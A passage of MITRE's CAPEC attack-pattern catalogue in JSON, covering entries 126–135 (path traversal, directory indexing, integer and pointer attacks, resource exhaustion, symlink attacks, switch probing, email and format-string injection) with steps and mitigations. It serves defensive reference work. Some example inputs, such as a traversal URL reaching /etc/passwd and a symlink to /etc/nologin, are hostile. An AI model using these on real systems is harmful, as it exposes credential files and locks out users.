directories or files.","Alternate_Terms":{"Alternate_Term":{"Term":"Directory Traversal"}},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"153"},{"Nature":"CanPrecede","CAPEC_ID":"664"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Fingerprinting of the operating system] In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.","Technique":["Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.","TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.","Induce errors to find informative error messages"]},{"Step":"2","Phase":"Explore","Description":"[Survey the Application to Identify User-controllable Inputs] The attacker surveys the target application to identify all user-controllable file inputs"},{"Step":"3","Phase":"Experiment","Description":"[Vary inputs, looking for malicious results] Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application"},{"Step":"4","Phase":"Exploit","Description":"[Manipulate files accessible by the application] The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)"}]},"Prerequisites":{"Prerequisite":["The attacker must be able to control the path that is requested of the target.","The target must fail to adequately sanitize incoming paths"]},"Skills_Required":{"Skill":["Simple command line attacks or to inject the malicious payload in a web page.",{"Level":"Low"},"Customizing attacks to bypass non trivial filters in the application.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Data","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Data","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"Unreliable Execution","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Mitigations":{"Mitigation":["Design: Configure the access control correctly.","Design: Enforce principle of least privilege.","Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.","Design: Input validation. Assume that user inputs are malicious. Utilize strict type, character, and encoding enforcement.","Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.","Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands.","Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.","Implementation: Perform input validation for all remote content, including remote and user-generated content.","Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables.","Implementation: Use indirect references rather than actual file names.","Implementation: Use possible permissions on file access when developing and deploying web applications.","Implementation: Validate user input by only accepting known good. Ensure all content that is delivered to client is sanitized against an acceptable content specification -- using an allowlist approach."]},"Example_Instances":{"Example":{"p":["An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request","From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system."],"div":["http://example/../../../../../etc/passwd",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"22"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"33","Entry_Name":"Path Traversal"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Path Traversal"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-9","Section":"Testing for Path Traversal (OWASP-AZ-001)"},{"External_Reference_ID":"REF-10","Section":"WASC-33 - Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Activation_Zone, Alternate_Terms, Architectural_Paradigms, Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, CIA_Impact, Examples-Instances, Frameworks, Injection_Vector, Languages, Payload, Payload_Activation_Impact, Platforms, Purposes, References, Related_Attack_Patterns, Related_Vulnerabilities, Related_Weaknesses, Relevant_Security_Requirements, Solutions_and_Mitigations, Technical_Context, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"127":{"ID":"127","Name":"Directory Indexing","Abstraction":"Detailed","Status":"Draft","Description":"An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory\'s contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Directory Discovery] Use a method, either manual, scripted, or automated to discover the directories on the server by making requests for directories that may possibly exist. During this phase the adversary is less concerned with whether a directory can be accessed or indexed and more focused on simply discovering what directories do exist on the target.","Technique":["Send requests to the web server for common directory names","If directories are discovered that are native to a server type further refine the directory search to include directories usually present on those types of servers.","Search for uncommon or potentially user created directories that may be present."]},{"Step":"2","Phase":"Experiment","Description":"[Iteratively explore directory/file structures] The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods","Technique":["Use a scanner tool to dynamically add directories/files to include their scan based upon data obtained in initial probes.","Use a browser to manually explore the website by issuing a request ending the URL in a slash \'/\'.","Attempt to bypass ACLs on directories by using methods that known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.","Sequentially request a list of common base files to each directory discovered.","Try multiple fuzzing techniques to list directory contents for directories that will not reveal their contents with a \\"/\\" request"]},{"Step":"3","Phase":"Exploit","Description":"[Read directories or files which are not intended for public viewing.] The adversary attempts to access the discovered directories that allow access and may attempt to bypass server or application level ACLs by using manual or automated methods","Technique":["Try multiple exploit techniques to list directory contents for directories that will not reveal their contents with a \\"/\\" request","Try other known exploits to elevate privileges sufficient to bypass protected directories.","List the files in the directory by issuing a request with the URL ending in a \\"/\\" slash.","Access the files via direct URL and capture contents.","Attempt to bypass ACLs on directories by using methods that are known to work against some server types by appending data to the directory request. For instance, appending a Null byte to the end of the request which may cause an ACL to fail and allow access.","Sequentially request a list of common base files to each directory discovered."]}]},"Prerequisites":{"Prerequisite":["The target must be misconfigured to return a list of a directory\'s content when it receives a request that ends in a directory name rather than a file name.","The adversary must be able to control the path that is requested of the target.","The administrator must have failed to properly configure an ACL or has associated an overly permissive ACL with a particular directory.","The server version or patch level must not inherently prevent known directory listing attacks from working."]},"Skills_Required":{"Skill":["To issue the request to URL without given a specific file name",{"Level":"Low"},"To bypass the access control of the directory of listings",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to send HTTP requests to a web application."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Information Leakage"}},"Mitigations":{"Mitigation":["1. Using blank index.html: putting blank index.html simply prevent directory listings from displaying to site visitors.","2. Preventing with .htaccess in Apache web server: In .htaccess, write \\"Options-indexes\\".","3. Suppressing error messages: using error 403 \\"Forbidden\\" message exactly like error 404 \\"Not Found\\" message."]},"Example_Instances":{"Example":{"p":["The adversary uses directory listing to view sensitive files in the application. This is an example of accessing the backup file. The attack issues a request for http://www.example.com/admin/ and receives the following dynamic directory indexing content in the response: Index of /admin Name Last Modified Size Description backup/ 31-May-2007 08:18 - Apache/ 2.0.55 Server at www.example.com Port 80","The target application does not have direct hyperlink to the \\"backup\\" directory in the normal html webpage, however the attacker has learned of this directory due to indexing the content. The client then requests the backup directory URL and receives output which has a \\"db_dump.php\\" file in it. This sensitive data should not be disclosed publicly."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"424"},{"CWE_ID":"425"},{"CWE_ID":"288"},{"CWE_ID":"285"},{"CWE_ID":"732"},{"CWE_ID":"276"},{"CWE_ID":"693"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1083","Entry_Name":"File and Directory Discovery"}},"References":{"Reference":{"External_Reference_ID":"REF-11","Section":"WASC-16 - Directory Indexing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Examples-Instances, Related_Vulnerabilities"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"128":{"ID":"128","Name":"Integer Attacks","Abstraction":"Standard","Status":"Draft","Description":"An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"153"}},"Prerequisites":{"Prerequisite":["The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.","The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"682"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"}]}},"129":{"ID":"129","Name":"Pointer Manipulation","Abstraction":"Meta","Status":"Draft","Description":"This attack pattern involves an adversary manipulating a pointer within a target application resulting in the application accessing an unintended memory location. This can result in the crashing of the application or, for certain pointer values, access to data that would not normally be possible or the execution of arbitrary code. Since pointers are simply integer variables, Integer Attacks may often be used in Pointer Attacks.","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target application must have a pointer variable that the attacker can influence to hold an arbitrary value."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"682"},{"CWE_ID":"822"},{"CWE_ID":"823"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Pointer Attack",{"Date":"2017-01-09"}]}},"130":{"ID":"130","Name":"Excessive Allocation","Abstraction":"Meta","Status":"Stable","Description":"An adversary causes the target to allocate excessive resources to servicing the attackers\' request, thereby reducing the resources available for legitimate services and degrading or denying services. Usually, this attack focuses on memory allocation, but any finite resource on the target could be the attacked, including bandwidth, processing cycles, or other resources. This attack does not attempt to force this allocation through a large number of requests (that would be Resource Depletion through Flooding) but instead uses one or a small number of requests that are carefully formatted to force the target to allocate excessive resources to service this request(s). Often this attack takes advantage of a bug in the target to cause the target to allocate resources vastly beyond what would be needed for a normal request.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"A successful excessive allocation attack forces the target system to exhaust its resources, thereby compromising the availability of its service."}},"Mitigations":{"Mitigation":["Limit the amount of resources that are accessible to unprivileged users.","Assume all input is malicious. Consider all potentially relevant properties when validating input.","Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.","Use resource-limiting settings, if possible."]},"Example_Instances":{"Example":"In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"404"},{"CWE_ID":"770"},{"CWE_ID":"1325"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.003","Entry_Name":"Endpoint Denial of Service:Application Exhaustion Flood"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"}]}},"131":{"ID":"131","Name":"Resource Leak Exposure","Abstraction":"Meta","Status":"Stable","Description":"An adversary utilizes a resource leak on the target to deplete the quantity of the resource available to service legitimate requests. Resource leaks most often come in the form of memory leaks where memory is allocated but never released after it has served its purpose, however, theoretically, any other resource that can be reserved can be targeted if the target fails to release the reservation when the reserved resource block is no longer needed. In this attack, the adversary determines what activity results in leaked resources and then triggers that activity on the target. Since some leaks may be small, this may require a large number of requests by the adversary. However, this attack differs from a flooding attack in that the rate of requests is generally not significant. This is because the lost resources due to the leak accumulate until the target is reset, usually by restarting it. Thus, a resource-poor adversary who would be unable to flood the target can still utilize this attack. Resource depletion through leak differs from resource depletion through allocation in that, in the former, the adversary may not be able to control the size of each leaked allocation, but instead allows the leak to accumulate until it is large enough to affect the target\'s performance. When depleting resources through allocation, the allocated resource may eventually be released by the target so the attack relies on making sure that the allocation size itself is prohibitive of normal operations by the target.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Prerequisites":{"Prerequisite":"The target must have a resource leak that the adversary can repeatedly trigger."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":"Availability","Impact":["Unreliable Execution","Resource Consumption"],"Note":"A successful resource leak exposure attack compromises the availability of the target system\'s services."}},"Mitigations":{"Mitigation":["If possible, leverage coding language(s) that do not allow this weakness to occur (e.g., Java, Ruby, and Python all perform automatic garbage collection that releases memory for objects that have been deallocated).","Memory should always be allocated/freed using matching functions (e.g., malloc/free, new/delete, etc.)","Implement best practices with respect to memory management, including the freeing of all allocated resources at all exit points and ensuring consistency with how and where memory is freed in a function."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"404"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1499","Entry_Name":"Endpoint Denial of Service"},{"Taxonomy_Name":"WASC","Entry_ID":"10","Entry_Name":"Denial of Service"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"132":{"ID":"132","Name":"Symlink Attack","Abstraction":"Detailed","Status":"Draft","Description":"An attacker positions a symbolic link in such a manner that the targeted user or application accesses the link\'s endpoint, assuming that it is accessing a file with the link\'s name. The endpoint file may be either output or input. If the file is output, the result is that the endpoint is modified, instead of a file at the intended location. Modifications to the endpoint file may include appending, overwriting, corrupting, changing permissions, or other modifications. In some variants of this attack the attacker may be able to control the change to a file while in other cases they cannot. The former is especially damaging since the attacker may be able to grant themselves increased privileges or insert false information, but the latter can also be damaging as it can expose sensitive information or corrupt or destroy vital system or application files. Alternatively, the endpoint file may serve as input to the targeted application. This can be used to feed malformed input into the target or to cause the target to process different information, possibly allowing the attacker to control the actions of the target or to cause the target to expose information to the attacker. Moreover, the actions taken on the endpoint file are undertaken with the permissions of the targeted user or application, which may exceed the permissions that the attacker would normally have.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify Target] Attacker identifies the target application by determining whether there is sufficient check before writing data to a file and creating symlinks to files in different directories.","Technique":["The attacker writes to files in different directories to check whether the application has sufficient checking before file operations.","The attacker creates symlinks to files in different directories."]},{"Step":"2","Phase":"Experiment","Description":"[Try to create symlinks to different files] The attacker then uses a variety of techniques, such as monitoring or guessing to create symlinks to the files accessed by the target application in the directories which are identified in the explore phase.","Technique":["The attacker monitors the file operations performed by the target application using a tool like dtrace or FileMon. And the attacker can delay the operations by using \\"sleep(2)\\" and \\"usleep()\\" to prepare the appropriate conditions for the attack, or make the application perform expansive tasks (large files parsing, etc.) depending on the purpose of the application.","The attacker may need a little guesswork on the filenames on which the target application would operate.","The attacker tries to create symlinks to the various filenames."]},{"Step":"3","Phase":"Exploit","Description":"[Target application operates on created symlinks to sensitive files] The attacker is able to create symlinks to sensitive files while the target application is operating on the file.","Technique":"Create the symlink to the sensitive file such as configuration files, etc."}]},"Prerequisites":{"Prerequisite":"The targeted application must perform the desired activities on a file without checking whether the file is a symbolic link or not. The attacker must be able to predict the name of the file the target application is modifying and be able to create a new symbolic link where that file would appear."},"Skills_Required":{"Skill":["To create symlinks",{"Level":"Low"},"To identify the files and create the symlinks during the file operation time window",{"Level":"High"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to create the necessary symbolic link."},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Other","Note":"Information Leakage"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Gain Privileges"},{"Scope":["Access Control","Authorization"],"Impact":"Bypass Protection Mechanism"},{"Scope":"Availability","Impact":"Unreliable Execution"}]},"Mitigations":{"Mitigation":["Design: Check for the existence of files to be created, if in existence verify they are neither symlinks nor hard links before opening them.","Implementation: Use randomly generated file names for temporary files. Give the files restrictive permissions."]},"Example_Instances":{"Example":{"p":["The attacker creates a symlink with the \\"same\\" name as the file which the application is intending to write to. The application will write to the file- \\"causing the data to be written where the symlink is pointing\\". An attack like this can be demonstrated as follows:","In the above example, the root user ran a program with poorly written file handling routines, providing the filename \\"myFile\\" to vulnprog for the relevant data to be written to. However, the attacker happened to be looking over the shoulder of \\"root\\" at the time, and created a link from myFile to /etc/nologin. The attack would make no user be able to login."],"div":["root# vulprog myFile",{"style":"margin-left:10px;","class":"informative","div":[{"i":"{...program does some processing...]"},{"i":"[...program writes to \'myFile\', which points to /etc/nologin...]"}]}]}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"59"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1547.009","Entry_Name":"Boot or Logon Autostart Execution:Shortcut Modification"}},"References":{"Reference":{"External_Reference_ID":"REF-13"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"133":{"ID":"133","Name":"Try All Common Switches","Abstraction":"Standard","Status":"Draft","Description":"An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is indiscriminately attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"113","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application] Discover an application of interest by exploring service registry listings or by connecting on a known port or some similar means.","Technique":["Search via internet for known, published applications that allow option switches.","Use automated tools to scan known ports to identify applications that might be accessible"]},{"Step":"2","Phase":"Explore","Description":"[Authenticate to application] Authenticate to the application, if required, in order to explore it.","Technique":["Use published credentials to access system.","Find unpublished credentails to access service.","Use other attack pattern or weakness to bypass authentication."]},{"Step":"3","Phase":"Experiment","Description":"[Try all common switches] Using manual or automated means, attempt to run the application with many different known common switches. Observe the output to see if any switches seemed to put the application in a non production mode that might give more information.","Technique":["Manually execute the application with switches such as --debug, --test, --development, --verbose, etc.","Use automated tools to run the application with common switches and observe the output"]},{"Step":"4","Phase":"Exploit","Description":"[Use sensitive processing or configuration information] Once extra information is observed from an application through the use of a common switch, this information is used to aid other attacks on the application","Technique":"Using application information, formulate an attack on the application"}]},"Prerequisites":{"Prerequisite":"The attacker must be able to control the options or switches sent to the target."},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack. The only requirement is the ability to send requests to the target."},"Mitigations":{"Mitigation":["Design: Minimize switch and option functionality to only that necessary for correct function of the command.","Implementation: Remove all debug and testing options from production code."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"912"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Try All Common Application Switches and Options",{"Date":"2015-12-07"}]}},"134":{"ID":"134","Name":"Email Injection","Abstraction":"Standard","Status":"Draft","Description":"An attacker manipulates the headers and content of an email message by injecting data via the use of delimiter characters native to the protocol. Many applications allow users to send email messages by filling in fields. For example, a web site may have a link to \\"share this site with a friend\\" where the user provides the recipient\'s email address and the web application fills out all the other fields, such as the subject and body. In this pattern, an attacker adds header and body information to an email message by injecting additional content in an input field used to construct a header of the mail message. This attack takes advantage of the fact that RFC 822 requires that headers in a mail message be separated by a carriage return. As a result, an attacker can inject new headers or content simply by adding a delimiting carriage return and then supplying the new heading and body information. This attack will not work if the user can only supply the message body since a carriage return in the body is treated as a normal character.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"137","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":["The target application must allow the user to send email to some recipient, to specify the content at least one header field in the message, and must fail to sanitize against the injection of command separators.","The adversary must have the ability to access the target mail application."]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"150"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"30","Entry_Name":"Mail Command Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Related_Attack_Patterns, Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"135":{"ID":"135","Name":"Format String Injection","Abstraction":"Standard","Status":"Draft","Description":"An adversary includes formatting characters in a string input field on the target application. Most applications assume that users will provide static text and may respond unpredictably to the presence of formatting character. For example, in certain functions of the C programming languages such as printf, the formatting character %s will print the contents of a memory location expecting this location to identify a string and the formatting character %n prints the number of DWORD written in the memory. An adversary can use this to read or write to memory locations or files, or simply to manipulate the value of the resulting text in unexpected ways. Reading or writing memory may result in program crashes and writing memory could result in the execution of arbitrary code if the adversary can write to the program 